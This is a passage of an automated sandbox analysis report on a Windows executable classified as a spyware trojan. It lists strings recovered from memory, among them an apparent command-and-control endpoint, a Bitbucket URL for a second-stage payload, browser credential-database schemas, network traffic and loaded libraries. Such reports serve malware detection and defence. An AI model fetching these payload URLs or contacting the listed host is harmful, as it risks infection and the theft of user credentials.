Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: OtHVIQ2ge4.exe, 00000000.00000003.1668686461.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E17000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1928241920.0000000006499000.00000002.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1668516238.0000000005E73000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.pro
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669516961.0000000001754000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1923369236.000000000135A000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe0
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeagerQ
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exef
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1571967887.0000000001762000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669516961.0000000001754000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1437414630.0000000005E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/RC
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1488527580.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488413895.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488229578.0000000005E30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/Uu
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515056514.0000000001755000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515380529.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1533192683.000000000170B000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/api
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/api-Age
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1515056514.0000000001755000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/apik
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/apip
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465585068.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488527580.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488413895.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1462101979.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488229578.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1460907654.0000000005E30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/ry
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1515056514.0000000001762000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1519646355.0000000001762000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/s
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1490713276.00000000016D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat:443/api
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1515306602.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490713276.00000000016D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat:443/apin.txtPK
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49717 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49723 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49729 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49735 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49741 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49747 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49759 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49770 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49776 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 52.217.75.84:443 -> 192.168.2.9:49783 version: TLS 1.2

                System Summary

                Source: OtHVIQ2ge4.exe | Static PE information: section name:
                Source: OtHVIQ2ge4.exe | Static PE information: section name: .rsrc
                Source: OtHVIQ2ge4.exe | Static PE information: section name: .idata
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_017130AE 0_3_017130AE
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_01713701 0_3_01713701
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_01713500 0_3_01713500
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 1936
                Source: OtHVIQ2ge4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: OtHVIQ2ge4.exe | Static PE information: Section: ZLIB complexity 0.9973512414383562
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7832
                Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c9c67909-b42d-472e-9381-c3db6b570ebe
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: OtHVIQ2ge4.exe, 00000000.00000003.1438313238.0000000005E42000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414543209.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414750808.0000000005DAD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1437984384.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OtHVIQ2ge4.exe | ReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File read: C:\Users\user\Desktop\OtHVIQ2ge4.exe
                Source: unknown | Process created: C:\Users\user\Desktop\OtHVIQ2ge4.exe "C:\Users\user\Desktop\OtHVIQ2ge4.exe"
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 1936
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Section loaded: version.dll
